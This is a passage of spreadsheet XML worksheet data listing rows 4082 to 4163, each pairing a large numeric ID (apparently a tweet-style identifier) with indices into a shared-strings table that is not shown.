        <v>1.2346453182952599E+18</v>
      </c>
      <c r="B4082" t="s">
        <v>10174</v>
      </c>
      <c r="C4082" t="s">
        <v>1</v>
      </c>
      <c r="D4082" t="s">
        <v>10175</v>
      </c>
      <c r="E4082" t="s">
        <v>10176</v>
      </c>
    </row>
    <row r="4083" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4083">
        <v>1.23464521391587E+18</v>
      </c>
      <c r="B4083" t="s">
        <v>10177</v>
      </c>
      <c r="C4083" t="s">
        <v>1</v>
      </c>
      <c r="D4083" t="s">
        <v>10178</v>
      </c>
      <c r="E4083" t="s">
        <v>7469</v>
      </c>
    </row>
    <row r="4084" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4084">
        <v>1.23464502459757E+18</v>
      </c>
      <c r="B4084" t="s">
        <v>10179</v>
      </c>
      <c r="C4084" t="s">
        <v>1</v>
      </c>
      <c r="D4084" t="s">
        <v>10180</v>
      </c>
      <c r="E4084" t="s">
        <v>4139</v>
      </c>
    </row>
    <row r="4085" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4085">
        <v>1.23464495511053E+18</v>
      </c>
      <c r="B4085" t="s">
        <v>10181</v>
      </c>
      <c r="C4085" t="s">
        <v>1</v>
      </c>
      <c r="D4085" t="s">
        <v>10182</v>
      </c>
      <c r="E4085" t="s">
        <v>8748</v>
      </c>
    </row>
    <row r="4086" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4086">
        <v>1.23464492997407E+18</v>
      </c>
      <c r="B4086" t="s">
        <v>10183</v>
      </c>
      <c r="C4086" t="s">
        <v>1</v>
      </c>
      <c r="D4086" t="s">
        <v>10184</v>
      </c>
      <c r="E4086" t="s">
        <v>10185</v>
      </c>
    </row>
    <row r="4087" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4087">
        <v>1.2346448389448901E+18</v>
      </c>
      <c r="B4087" t="s">
        <v>10186</v>
      </c>
      <c r="C4087" t="s">
        <v>1</v>
      </c>
      <c r="D4087" t="s">
        <v>10187</v>
      </c>
      <c r="E4087" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="4088" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4088">
        <v>1.23464472787567E+18</v>
      </c>
      <c r="B4088" t="s">
        <v>10188</v>
      </c>
      <c r="C4088" t="s">
        <v>1</v>
      </c>
      <c r="D4088" t="s">
        <v>10189</v>
      </c>
      <c r="E4088" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="4089" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4089">
        <v>1.2346442033402501E+18</v>
      </c>
      <c r="B4089" t="s">
        <v>10190</v>
      </c>
      <c r="C4089" t="s">
        <v>1</v>
      </c>
      <c r="D4089" t="s">
        <v>10191</v>
      </c>
      <c r="E4089" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="4090" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4090">
        <v>1.2346439576085199E+18</v>
      </c>
      <c r="B4090" t="s">
        <v>10192</v>
      </c>
      <c r="C4090" t="s">
        <v>1</v>
      </c>
      <c r="D4090" t="s">
        <v>10193</v>
      </c>
      <c r="E4090" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="4091" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4091">
        <v>1.2346424080816399E+18</v>
      </c>
      <c r="B4091" t="s">
        <v>10194</v>
      </c>
      <c r="C4091" t="s">
        <v>1</v>
      </c>
      <c r="D4091" t="s">
        <v>10195</v>
      </c>
      <c r="E4091" t="s">
        <v>10196</v>
      </c>
    </row>
    <row r="4092" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4092">
        <v>1.2346420332115799E+18</v>
      </c>
      <c r="B4092" t="s">
        <v>10197</v>
      </c>
      <c r="C4092" t="s">
        <v>1</v>
      </c>
      <c r="D4092" t="s">
        <v>4199</v>
      </c>
      <c r="E4092" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4093" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4093">
        <v>1.2346417356676301E+18</v>
      </c>
      <c r="B4093" t="s">
        <v>10198</v>
      </c>
      <c r="C4093" t="s">
        <v>1</v>
      </c>
      <c r="D4093" t="s">
        <v>10199</v>
      </c>
      <c r="E4093" t="s">
        <v>10200</v>
      </c>
    </row>
    <row r="4094" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4094">
        <v>1.23464105442449E+18</v>
      </c>
      <c r="B4094" t="s">
        <v>10201</v>
      </c>
      <c r="C4094" t="s">
        <v>1</v>
      </c>
      <c r="D4094" t="s">
        <v>10202</v>
      </c>
      <c r="E4094" t="s">
        <v>9865</v>
      </c>
    </row>
    <row r="4095" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4095">
        <v>1.23464091825232E+18</v>
      </c>
      <c r="B4095" t="s">
        <v>10203</v>
      </c>
      <c r="C4095" t="s">
        <v>1</v>
      </c>
      <c r="D4095" t="s">
        <v>10204</v>
      </c>
      <c r="E4095" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="4096" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4096">
        <v>1.2346408238091699E+18</v>
      </c>
      <c r="B4096" t="s">
        <v>10205</v>
      </c>
      <c r="C4096" t="s">
        <v>1</v>
      </c>
      <c r="D4096" t="s">
        <v>10206</v>
      </c>
      <c r="E4096" t="s">
        <v>10207</v>
      </c>
    </row>
    <row r="4097" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4097">
        <v>1.23464044367102E+18</v>
      </c>
      <c r="B4097" t="s">
        <v>10208</v>
      </c>
      <c r="C4097" t="s">
        <v>1</v>
      </c>
      <c r="D4097" t="s">
        <v>10209</v>
      </c>
      <c r="E4097" t="s">
        <v>10210</v>
      </c>
    </row>
    <row r="4098" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4098">
        <v>1.23463986861934E+18</v>
      </c>
      <c r="B4098" t="s">
        <v>10211</v>
      </c>
      <c r="C4098" t="s">
        <v>1</v>
      </c>
      <c r="D4098" t="s">
        <v>10212</v>
      </c>
      <c r="E4098" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="4099" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4099">
        <v>1.23463812632224E+18</v>
      </c>
      <c r="B4099" t="s">
        <v>10213</v>
      </c>
      <c r="C4099" t="s">
        <v>1</v>
      </c>
      <c r="D4099" t="s">
        <v>10214</v>
      </c>
      <c r="E4099" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="4100" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4100">
        <v>1.23463772505314E+18</v>
      </c>
      <c r="B4100" t="s">
        <v>10215</v>
      </c>
      <c r="C4100" t="s">
        <v>1</v>
      </c>
      <c r="D4100" t="s">
        <v>10216</v>
      </c>
      <c r="E4100" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="4101" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4101">
        <v>1.23463737420386E+18</v>
      </c>
      <c r="B4101" t="s">
        <v>10217</v>
      </c>
      <c r="C4101" t="s">
        <v>1</v>
      </c>
      <c r="D4101" t="s">
        <v>10218</v>
      </c>
      <c r="E4101" t="s">
        <v>4228</v>
      </c>
    </row>
    <row r="4102" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4102">
        <v>1.23463716081443E+18</v>
      </c>
      <c r="B4102" t="s">
        <v>10219</v>
      </c>
      <c r="C4102" t="s">
        <v>1</v>
      </c>
      <c r="D4102" t="s">
        <v>10220</v>
      </c>
      <c r="E4102" t="s">
        <v>1645</v>
      </c>
    </row>
    <row r="4103" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4103">
        <v>1.2346364350320599E+18</v>
      </c>
      <c r="B4103" t="s">
        <v>10221</v>
      </c>
      <c r="C4103" t="s">
        <v>1</v>
      </c>
      <c r="D4103" t="s">
        <v>10222</v>
      </c>
      <c r="E4103" t="s">
        <v>10223</v>
      </c>
    </row>
    <row r="4104" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4104">
        <v>1.2346363888024E+18</v>
      </c>
      <c r="B4104" t="s">
        <v>10224</v>
      </c>
      <c r="C4104" t="s">
        <v>1</v>
      </c>
      <c r="D4104" t="s">
        <v>10225</v>
      </c>
      <c r="E4104" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="4105" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4105">
        <v>1.2346362668908301E+18</v>
      </c>
      <c r="B4105" t="s">
        <v>10226</v>
      </c>
      <c r="C4105" t="s">
        <v>1</v>
      </c>
      <c r="D4105" t="s">
        <v>10227</v>
      </c>
      <c r="E4105" t="s">
        <v>10228</v>
      </c>
    </row>
    <row r="4106" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4106">
        <v>1.2346358635204201E+18</v>
      </c>
      <c r="B4106" t="s">
        <v>10229</v>
      </c>
      <c r="C4106" t="s">
        <v>1</v>
      </c>
      <c r="D4106" t="s">
        <v>10230</v>
      </c>
      <c r="E4106" t="s">
        <v>10231</v>
      </c>
    </row>
    <row r="4107" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4107">
        <v>1.23463581926194E+18</v>
      </c>
      <c r="B4107" t="s">
        <v>10232</v>
      </c>
      <c r="C4107" t="s">
        <v>1</v>
      </c>
      <c r="D4107" t="s">
        <v>10233</v>
      </c>
      <c r="E4107" t="s">
        <v>10234</v>
      </c>
    </row>
    <row r="4108" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4108">
        <v>1.2346354688531799E+18</v>
      </c>
      <c r="B4108" t="s">
        <v>10235</v>
      </c>
      <c r="C4108" t="s">
        <v>1</v>
      </c>
      <c r="D4108" t="s">
        <v>10236</v>
      </c>
      <c r="E4108" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="4109" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4109">
        <v>1.2346329829898199E+18</v>
      </c>
      <c r="B4109" t="s">
        <v>10237</v>
      </c>
      <c r="C4109" t="s">
        <v>1</v>
      </c>
      <c r="D4109" t="s">
        <v>10238</v>
      </c>
      <c r="E4109" t="s">
        <v>7210</v>
      </c>
    </row>
    <row r="4110" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4110">
        <v>1.2346328862272699E+18</v>
      </c>
      <c r="B4110" t="s">
        <v>10239</v>
      </c>
      <c r="C4110" t="s">
        <v>1</v>
      </c>
      <c r="D4110" t="s">
        <v>10240</v>
      </c>
      <c r="E4110" t="s">
        <v>10241</v>
      </c>
    </row>
    <row r="4111" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4111">
        <v>1.23463285280285E+18</v>
      </c>
      <c r="B4111" t="s">
        <v>10242</v>
      </c>
      <c r="C4111" t="s">
        <v>1</v>
      </c>
      <c r="D4111" t="s">
        <v>10243</v>
      </c>
      <c r="E4111" t="s">
        <v>10244</v>
      </c>
    </row>
    <row r="4112" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4112">
        <v>1.23463279620912E+18</v>
      </c>
      <c r="B4112" t="s">
        <v>10245</v>
      </c>
      <c r="C4112" t="s">
        <v>1</v>
      </c>
      <c r="D4112" t="s">
        <v>10246</v>
      </c>
      <c r="E4112" t="s">
        <v>1783</v>
      </c>
    </row>
    <row r="4113" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4113">
        <v>1.2346325480489201E+18</v>
      </c>
      <c r="B4113" t="s">
        <v>10247</v>
      </c>
      <c r="C4113" t="s">
        <v>1</v>
      </c>
      <c r="D4113" t="s">
        <v>10248</v>
      </c>
      <c r="E4113" t="s">
        <v>10249</v>
      </c>
    </row>
    <row r="4114" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4114">
        <v>1.2346323761663501E+18</v>
      </c>
      <c r="B4114" t="s">
        <v>10250</v>
      </c>
      <c r="C4114" t="s">
        <v>1</v>
      </c>
      <c r="D4114" t="s">
        <v>10251</v>
      </c>
      <c r="E4114" t="s">
        <v>10252</v>
      </c>
    </row>
    <row r="4115" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4115">
        <v>1.2346323362239301E+18</v>
      </c>
      <c r="B4115" t="s">
        <v>10253</v>
      </c>
      <c r="C4115" t="s">
        <v>1</v>
      </c>
      <c r="D4115" t="s">
        <v>10254</v>
      </c>
      <c r="E4115" t="s">
        <v>7011</v>
      </c>
    </row>
    <row r="4116" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4116">
        <v>1.23463211067523E+18</v>
      </c>
      <c r="B4116" t="s">
        <v>10255</v>
      </c>
      <c r="C4116" t="s">
        <v>1</v>
      </c>
      <c r="D4116" t="s">
        <v>10256</v>
      </c>
      <c r="E4116" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="4117" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4117">
        <v>1.23463171812195E+18</v>
      </c>
      <c r="B4117" t="s">
        <v>10257</v>
      </c>
      <c r="C4117" t="s">
        <v>1</v>
      </c>
      <c r="D4117" t="s">
        <v>10258</v>
      </c>
      <c r="E4117" t="s">
        <v>7223</v>
      </c>
    </row>
    <row r="4118" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4118">
        <v>1.23463171375987E+18</v>
      </c>
      <c r="B4118" t="s">
        <v>10259</v>
      </c>
      <c r="C4118" t="s">
        <v>1</v>
      </c>
      <c r="D4118" t="s">
        <v>10260</v>
      </c>
      <c r="E4118" t="s">
        <v>10261</v>
      </c>
    </row>
    <row r="4119" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4119">
        <v>1.2346315339836001E+18</v>
      </c>
      <c r="B4119" t="s">
        <v>10262</v>
      </c>
      <c r="C4119" t="s">
        <v>1</v>
      </c>
      <c r="D4119" t="s">
        <v>10263</v>
      </c>
      <c r="E4119" t="s">
        <v>7226</v>
      </c>
    </row>
    <row r="4120" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4120">
        <v>1.23463124758813E+18</v>
      </c>
      <c r="B4120" t="s">
        <v>10264</v>
      </c>
      <c r="C4120" t="s">
        <v>1</v>
      </c>
      <c r="D4120" t="s">
        <v>10265</v>
      </c>
      <c r="E4120" t="s">
        <v>5256</v>
      </c>
    </row>
    <row r="4121" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4121">
        <v>1.23463123819297E+18</v>
      </c>
      <c r="B4121" t="s">
        <v>10266</v>
      </c>
      <c r="C4121" t="s">
        <v>1</v>
      </c>
      <c r="D4121" t="s">
        <v>10267</v>
      </c>
      <c r="E4121" t="s">
        <v>9903</v>
      </c>
    </row>
    <row r="4122" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4122">
        <v>1.23463123057184E+18</v>
      </c>
      <c r="B4122" t="s">
        <v>10268</v>
      </c>
      <c r="C4122" t="s">
        <v>1</v>
      </c>
      <c r="D4122" t="s">
        <v>10269</v>
      </c>
      <c r="E4122" t="s">
        <v>7832</v>
      </c>
    </row>
    <row r="4123" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4123">
        <v>1.2346311071293499E+18</v>
      </c>
      <c r="B4123" t="s">
        <v>10270</v>
      </c>
      <c r="C4123" t="s">
        <v>1</v>
      </c>
      <c r="D4123" t="s">
        <v>10271</v>
      </c>
      <c r="E4123" t="s">
        <v>10272</v>
      </c>
    </row>
    <row r="4124" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4124">
        <v>1.2346310823703099E+18</v>
      </c>
      <c r="B4124" t="s">
        <v>10273</v>
      </c>
      <c r="C4124" t="s">
        <v>1</v>
      </c>
      <c r="D4124" t="s">
        <v>10274</v>
      </c>
      <c r="E4124" t="s">
        <v>5263</v>
      </c>
    </row>
    <row r="4125" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4125">
        <v>1.2346309838964301E+18</v>
      </c>
      <c r="B4125" t="s">
        <v>10275</v>
      </c>
      <c r="C4125" t="s">
        <v>1</v>
      </c>
      <c r="D4125" t="s">
        <v>10276</v>
      </c>
      <c r="E4125" t="s">
        <v>4792</v>
      </c>
    </row>
    <row r="4126" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4126">
        <v>1.2346308582183301E+18</v>
      </c>
      <c r="B4126" t="s">
        <v>10277</v>
      </c>
      <c r="C4126" t="s">
        <v>1</v>
      </c>
      <c r="D4126" t="s">
        <v>10278</v>
      </c>
      <c r="E4126" t="s">
        <v>10279</v>
      </c>
    </row>
    <row r="4127" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4127">
        <v>1.23463083827025E+18</v>
      </c>
      <c r="B4127" t="s">
        <v>10280</v>
      </c>
      <c r="C4127" t="s">
        <v>1</v>
      </c>
      <c r="D4127" t="s">
        <v>10281</v>
      </c>
      <c r="E4127" t="s">
        <v>783</v>
      </c>
    </row>
    <row r="4128" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4128">
        <v>1.2346305160259799E+18</v>
      </c>
      <c r="B4128" t="s">
        <v>10282</v>
      </c>
      <c r="C4128" t="s">
        <v>1</v>
      </c>
      <c r="D4128" t="s">
        <v>10283</v>
      </c>
      <c r="E4128" t="s">
        <v>10284</v>
      </c>
    </row>
    <row r="4129" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4129">
        <v>1.2346304942156301E+18</v>
      </c>
      <c r="B4129" t="s">
        <v>10285</v>
      </c>
      <c r="C4129" t="s">
        <v>1</v>
      </c>
      <c r="D4129" t="s">
        <v>10286</v>
      </c>
      <c r="E4129" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="4130" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4130">
        <v>1.2346299072186501E+18</v>
      </c>
      <c r="B4130" t="s">
        <v>10287</v>
      </c>
      <c r="C4130" t="s">
        <v>1</v>
      </c>
      <c r="D4130" t="s">
        <v>10288</v>
      </c>
      <c r="E4130" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="4131" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4131">
        <v>1.23462978547888E+18</v>
      </c>
      <c r="B4131" t="s">
        <v>10289</v>
      </c>
      <c r="C4131" t="s">
        <v>1</v>
      </c>
      <c r="D4131" t="s">
        <v>10290</v>
      </c>
      <c r="E4131" t="s">
        <v>10291</v>
      </c>
    </row>
    <row r="4132" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4132">
        <v>1.2346297257855501E+18</v>
      </c>
      <c r="B4132" t="s">
        <v>10292</v>
      </c>
      <c r="C4132" t="s">
        <v>1</v>
      </c>
      <c r="D4132" t="s">
        <v>10293</v>
      </c>
      <c r="E4132" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="4133" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4133">
        <v>1.2346277826776699E+18</v>
      </c>
      <c r="B4133" t="s">
        <v>10294</v>
      </c>
      <c r="C4133" t="s">
        <v>1</v>
      </c>
      <c r="D4133" t="s">
        <v>10295</v>
      </c>
      <c r="E4133" t="s">
        <v>5351</v>
      </c>
    </row>
    <row r="4134" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4134">
        <v>1.23462695197491E+18</v>
      </c>
      <c r="B4134" t="s">
        <v>10296</v>
      </c>
      <c r="C4134" t="s">
        <v>1</v>
      </c>
      <c r="D4134" t="s">
        <v>10297</v>
      </c>
      <c r="E4134" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="4135" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4135">
        <v>1.2346267479722099E+18</v>
      </c>
      <c r="B4135" t="s">
        <v>10299</v>
      </c>
      <c r="C4135" t="s">
        <v>1</v>
      </c>
      <c r="D4135" t="s">
        <v>10300</v>
      </c>
      <c r="E4135" t="s">
        <v>1412</v>
      </c>
    </row>
    <row r="4136" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4136">
        <v>1.23462584231711E+18</v>
      </c>
      <c r="B4136" t="s">
        <v>10301</v>
      </c>
      <c r="C4136" t="s">
        <v>1</v>
      </c>
      <c r="D4136" t="s">
        <v>10302</v>
      </c>
      <c r="E4136" t="s">
        <v>10303</v>
      </c>
    </row>
    <row r="4137" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4137">
        <v>1.2346258195170299E+18</v>
      </c>
      <c r="B4137" t="s">
        <v>10304</v>
      </c>
      <c r="C4137" t="s">
        <v>1</v>
      </c>
      <c r="D4137" t="s">
        <v>10305</v>
      </c>
      <c r="E4137" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="4138" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4138">
        <v>1.23462554580082E+18</v>
      </c>
      <c r="B4138" t="s">
        <v>10306</v>
      </c>
      <c r="C4138" t="s">
        <v>1</v>
      </c>
      <c r="D4138" t="s">
        <v>10307</v>
      </c>
      <c r="E4138" t="s">
        <v>10308</v>
      </c>
    </row>
    <row r="4139" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4139">
        <v>1.2346249053934899E+18</v>
      </c>
      <c r="B4139" t="s">
        <v>10309</v>
      </c>
      <c r="C4139" t="s">
        <v>1</v>
      </c>
      <c r="D4139" t="s">
        <v>10310</v>
      </c>
      <c r="E4139" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="4140" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4140">
        <v>1.2346237188250399E+18</v>
      </c>
      <c r="B4140" t="s">
        <v>10311</v>
      </c>
      <c r="C4140" t="s">
        <v>1</v>
      </c>
      <c r="D4140" t="s">
        <v>10312</v>
      </c>
      <c r="E4140" t="s">
        <v>10313</v>
      </c>
    </row>
    <row r="4141" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4141">
        <v>1.23462322107022E+18</v>
      </c>
      <c r="B4141" t="s">
        <v>10314</v>
      </c>
      <c r="C4141" t="s">
        <v>1</v>
      </c>
      <c r="D4141" t="s">
        <v>10315</v>
      </c>
      <c r="E4141" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="4142" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4142">
        <v>1.2346224977163899E+18</v>
      </c>
      <c r="B4142" t="s">
        <v>10316</v>
      </c>
      <c r="C4142" t="s">
        <v>1</v>
      </c>
      <c r="D4142" t="s">
        <v>10317</v>
      </c>
      <c r="E4142" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="4143" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4143">
        <v>1.2346223034152901E+18</v>
      </c>
      <c r="B4143" t="s">
        <v>10318</v>
      </c>
      <c r="C4143" t="s">
        <v>1</v>
      </c>
      <c r="D4143" t="s">
        <v>10319</v>
      </c>
      <c r="E4143" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="4144" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4144">
        <v>1.2346220523734899E+18</v>
      </c>
      <c r="B4144" t="s">
        <v>10320</v>
      </c>
      <c r="C4144" t="s">
        <v>1</v>
      </c>
      <c r="D4144" t="s">
        <v>10321</v>
      </c>
      <c r="E4144" t="s">
        <v>10322</v>
      </c>
    </row>
    <row r="4145" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4145">
        <v>1.23462169898241E+18</v>
      </c>
      <c r="B4145" t="s">
        <v>10323</v>
      </c>
      <c r="C4145" t="s">
        <v>1</v>
      </c>
      <c r="D4145" t="s">
        <v>10324</v>
      </c>
      <c r="E4145" t="s">
        <v>10325</v>
      </c>
    </row>
    <row r="4146" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4146">
        <v>1.2346196456315799E+18</v>
      </c>
      <c r="B4146" t="s">
        <v>10326</v>
      </c>
      <c r="C4146" t="s">
        <v>1</v>
      </c>
      <c r="D4146" t="s">
        <v>10327</v>
      </c>
      <c r="E4146" t="s">
        <v>8663</v>
      </c>
    </row>
    <row r="4147" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4147">
        <v>1.23461843733651E+18</v>
      </c>
      <c r="B4147" t="s">
        <v>10328</v>
      </c>
      <c r="C4147" t="s">
        <v>1</v>
      </c>
      <c r="D4147" t="s">
        <v>10329</v>
      </c>
      <c r="E4147" t="s">
        <v>7460</v>
      </c>
    </row>
    <row r="4148" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4148">
        <v>1.2346183542598899E+18</v>
      </c>
      <c r="B4148" t="s">
        <v>10330</v>
      </c>
      <c r="C4148" t="s">
        <v>1</v>
      </c>
      <c r="D4148" t="s">
        <v>10331</v>
      </c>
      <c r="E4148" t="s">
        <v>10332</v>
      </c>
    </row>
    <row r="4149" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4149">
        <v>1.2346182904688E+18</v>
      </c>
      <c r="B4149" t="s">
        <v>10333</v>
      </c>
      <c r="C4149" t="s">
        <v>1</v>
      </c>
      <c r="D4149" t="s">
        <v>10334</v>
      </c>
      <c r="E4149" t="s">
        <v>8391</v>
      </c>
    </row>
    <row r="4150" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4150">
        <v>1.2346182419323E+18</v>
      </c>
      <c r="B4150" t="s">
        <v>10335</v>
      </c>
      <c r="C4150" t="s">
        <v>1</v>
      </c>
      <c r="D4150" t="s">
        <v>10336</v>
      </c>
      <c r="E4150" t="s">
        <v>10337</v>
      </c>
    </row>
    <row r="4151" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4151">
        <v>1.2346181640818099E+18</v>
      </c>
      <c r="B4151" t="s">
        <v>10338</v>
      </c>
      <c r="C4151" t="s">
        <v>1</v>
      </c>
      <c r="D4151" t="s">
        <v>10339</v>
      </c>
      <c r="E4151" t="s">
        <v>10340</v>
      </c>
    </row>
    <row r="4152" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4152">
        <v>1.23461791754481E+18</v>
      </c>
      <c r="B4152" t="s">
        <v>10341</v>
      </c>
      <c r="C4152" t="s">
        <v>1</v>
      </c>
      <c r="D4152" t="s">
        <v>10342</v>
      </c>
      <c r="E4152" t="s">
        <v>7268</v>
      </c>
    </row>
    <row r="4153" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4153">
        <v>1.2346174676847401E+18</v>
      </c>
      <c r="B4153" t="s">
        <v>10343</v>
      </c>
      <c r="C4153" t="s">
        <v>1</v>
      </c>
      <c r="D4153" t="s">
        <v>10344</v>
      </c>
      <c r="E4153" t="s">
        <v>10345</v>
      </c>
    </row>
    <row r="4154" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4154">
        <v>1.2346173626467999E+18</v>
      </c>
      <c r="B4154" t="s">
        <v>10346</v>
      </c>
      <c r="C4154" t="s">
        <v>1</v>
      </c>
      <c r="D4154" t="s">
        <v>10347</v>
      </c>
      <c r="E4154" t="s">
        <v>10348</v>
      </c>
    </row>
    <row r="4155" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4155">
        <v>1.23461720948339E+18</v>
      </c>
      <c r="B4155" t="s">
        <v>10349</v>
      </c>
      <c r="C4155" t="s">
        <v>1</v>
      </c>
      <c r="D4155" t="s">
        <v>10350</v>
      </c>
      <c r="E4155" t="s">
        <v>10173</v>
      </c>
    </row>
    <row r="4156" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4156">
        <v>1.2346171735213701E+18</v>
      </c>
      <c r="B4156" t="s">
        <v>10351</v>
      </c>
      <c r="C4156" t="s">
        <v>1</v>
      </c>
      <c r="D4156" t="s">
        <v>10352</v>
      </c>
      <c r="E4156" t="s">
        <v>10176</v>
      </c>
    </row>
    <row r="4157" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4157">
        <v>1.2346160718790001E+18</v>
      </c>
      <c r="B4157" t="s">
        <v>10353</v>
      </c>
      <c r="C4157" t="s">
        <v>1</v>
      </c>
      <c r="D4157" t="s">
        <v>10354</v>
      </c>
      <c r="E4157" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="4158" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4158">
        <v>1.23461589026573E+18</v>
      </c>
      <c r="B4158" t="s">
        <v>10355</v>
      </c>
      <c r="C4158" t="s">
        <v>1</v>
      </c>
      <c r="D4158" t="s">
        <v>10356</v>
      </c>
      <c r="E4158" t="s">
        <v>10357</v>
      </c>
    </row>
    <row r="4159" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4159">
        <v>1.2346153437521001E+18</v>
      </c>
      <c r="B4159" t="s">
        <v>10358</v>
      </c>
      <c r="C4159" t="s">
        <v>1</v>
      </c>
      <c r="D4159" t="s">
        <v>10359</v>
      </c>
      <c r="E4159" t="s">
        <v>10360</v>
      </c>
    </row>
    <row r="4160" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4160">
        <v>1.2346153054623201E+18</v>
      </c>
      <c r="B4160" t="s">
        <v>10361</v>
      </c>
      <c r="C4160" t="s">
        <v>1</v>
      </c>
      <c r="D4160" t="s">
        <v>10362</v>
      </c>
      <c r="E4160" t="s">
        <v>7273</v>
      </c>
    </row>
    <row r="4161" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4161">
        <v>1.23461526576318E+18</v>
      </c>
      <c r="B4161" t="s">
        <v>10363</v>
      </c>
      <c r="C4161" t="s">
        <v>1</v>
      </c>
      <c r="D4161" t="s">
        <v>10364</v>
      </c>
      <c r="E4161" t="s">
        <v>5503</v>
      </c>
    </row>
    <row r="4162" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4162">
        <v>1.2346151886383501E+18</v>
      </c>
      <c r="B4162" t="s">
        <v>10365</v>
      </c>
      <c r="C4162" t="s">
        <v>1</v>
      </c>
      <c r="D4162" t="s">
        <v>10366</v>
      </c>
      <c r="E4162" t="s">
        <v>7250</v>
      </c>
    </row>
    <row r="4163" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4163">
        <v>1.2346150916995699E+18</v>
      </c>
      <c r="B4163" t="s">
        <v>10367</v>
      </c>
